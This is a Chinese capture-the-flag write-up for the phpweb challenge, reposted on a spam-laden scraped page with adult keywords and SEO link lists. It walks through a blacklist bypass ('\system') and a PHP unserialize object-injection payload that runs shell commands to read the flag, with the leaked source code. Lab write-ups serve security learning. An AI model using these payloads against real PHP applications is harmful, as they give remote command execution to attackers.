国产亚洲精品福利在线无卡一,国产精久久一区二区三区,亚洲精品无码国模,精品久久久久久无码专区不卡

當前位置: 首頁 > news >正文

西安做網(wǎng)站印象網(wǎng)絡整合營銷策劃

西安做網(wǎng)站印象網(wǎng)絡,整合營銷策劃,網(wǎng)站建設項目報告書,中企動力銷售陪酒多嗎BUU [網(wǎng)鼎杯 2020 朱雀組]phpweb 眾生皆懶狗。打開題目,只有一個報錯,不知何從下手。 翻譯一下報錯,data()函數(shù):,還是沒有頭緒,中國有句古話說的好“遇事不決抓個包” 抓個包果然有東西,仔細一看這不就分別是函數(shù)和參…

BUU [網(wǎng)鼎杯 2020 朱雀組]phpweb

眾生皆懶狗。打開題目,只有一個報錯,不知何從下手。

img

翻譯一下報錯,data()函數(shù):,還是沒有頭緒,中國有句古話說的好“遇事不決抓個包”

img

抓個包果然有東西,仔細一看這不就分別是函數(shù)和參數(shù)嗎,試一下別的,從報錯發(fā)現(xiàn)和函數(shù)call_user_func()有關系。

img

img

試一下命令執(zhí)行有過濾,難辦,那還是得辦。從這里開始分為兩種方法了。

img

法一:

繞過過濾:

\system("ls");

\system可以繞過黑名單的原因:php內(nèi)的" \ "在做代碼執(zhí)行的時候,會識別特殊字符串。

Payload:func=\system&p=tac $(find / -name fla*)

一步到位。

img

法二:

利用file_get_contents獲取index.php的源碼,

func=file_get_contents&p=index.php

源碼如下

  <?php$disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk",  "array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce","array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents");function gettime($func, $p) {
?    $result = call_user_func($func, $p);
?    $a= gettype($result);
?    if ($a == "string") {
?      return $result;
?    } else {return "";}}class Test {
?    var $p = "Y-m-d h:i:s a";
?    var $func = "date";
?    function __destruct() {
?      if ($this->func != "") {
?        echo gettime($this->func, $this->p);
?      }
?    }}$func = $_REQUEST["func"];$p = $_REQUEST["p"];if ($func != null) {
?    $func = strtolower($func);
?    if (!in_array($func,$disable_fun)) {
?      echo gettime($func, $p);
?    }else {
?      die("Hacker...");
?    }}?>

媽呀過濾的真多,麻了,幸好沒有去一個一個測試。

分析一下代碼,是存在反序列化漏洞的。我們可以傳進去 f u n c = u n s e r i a l i z e , func=unserialize, func=unserialize,p=序列化后的字符串??梢孕蛄谢疶ext類,其中var $p = “tac $(find / -name fla*)”;var $func = “system”;【注意這里的類里面的func和p與傳進去的不一樣,不需要進行過濾】,貌似反序列化的題經(jīng)常喜歡拿名字一樣的兩個東西來混淆視聽,這個應該是考察我們對序列化和代碼的理解能力。

構造exp

img

Payload:

func=unserialize&p=O%3A4%3A%22Test%22%3A2%3A%7Bs%3A1%3A%22p%22%3Bs%3A24%3A%22tac+%24%28find+%2F+-name+fla%2A%29%22%3Bs%3A4%3A%22func%22%3Bs%3A6%3A%22system%22%3B%7D

(這里應該是可以不url編碼直接傳字符串的)

也可以是Payload:

func=unserialize&p=O:4:“Test”:2:{s:1:“p”;s:24:“tac $(find / -name fla*)”;s:4:“func”;s:6:“system”;}

img

補充法:

好像也可以利用highlight_file或者show_source獲取index.php的源碼,做法和法二一樣。

http://aloenet.com.cn/news/45972.html

相關文章:

  • 新鄉(xiāng)網(wǎng)站建設哪家正規(guī)不需要驗證碼的廣告平臺
  • 低價的網(wǎng)站建設互聯(lián)網(wǎng)公司排名2021
  • 太原做網(wǎng)站的惠州seo排名公司
  • 永久免費網(wǎng)站建立國內(nèi)新聞最新消息今天
  • 建設部網(wǎng)站施工合同公司官網(wǎng)開發(fā)制作
  • dw如何用表格做網(wǎng)站深圳網(wǎng)站設計知名樂云seo
  • 閘北專業(yè)做網(wǎng)站seo搜索引擎實訓心得體會
  • 簡單模板網(wǎng)站制作時間百度優(yōu)化是什么意思
  • 武漢網(wǎng)站建設老牌公司適合推廣的app有哪些
  • 網(wǎng)站建設代碼生成器重慶seo外包平臺
  • dw軟件做二級連接網(wǎng)站長春網(wǎng)站制作推廣
  • 南京美容網(wǎng)站建設營銷案例
  • 網(wǎng)站建設報價明細表指數(shù)分布的分布函數(shù)
  • 福州正規(guī)網(wǎng)站建設公司報價雙灤區(qū)seo整站排名
  • 蕪湖做公司網(wǎng)站網(wǎng)站優(yōu)化排名網(wǎng)站
  • 哪個教育網(wǎng)站做助理造價師培訓關鍵詞優(yōu)化排名用哪些軟件比較好
  • 手機網(wǎng)站推廣怎么做軟文營銷常用的方式
  • 凡科做的網(wǎng)站手機版目錄搜索引擎有哪些
  • 有什么軟件可以找客戶搜索引擎營銷與seo優(yōu)化
  • 網(wǎng)站admin目錄名怎么改百度運營公司
  • 做網(wǎng)站可以用python么谷歌搜索入口365
  • 做網(wǎng)站需要填什么軟文推廣代表平臺
  • 工業(yè)b2b網(wǎng)站建設網(wǎng)站推廣的目的
  • 閘北區(qū)網(wǎng)站建設搜索推廣代運營
  • 官方網(wǎng)站平臺有哪些百度關鍵字推廣費用
  • 自己做電影網(wǎng)站可以賺錢嗎新媒體運營培訓班
  • 懶人做圖網(wǎng)站江門seo
  • 國外家譜網(wǎng)站的建設關鍵詞排名怎么做上首頁
  • 四川成都最新新聞事件今天深圳谷歌seo推廣
  • 自己的服務器做網(wǎng)站優(yōu)速網(wǎng)站建設優(yōu)化seo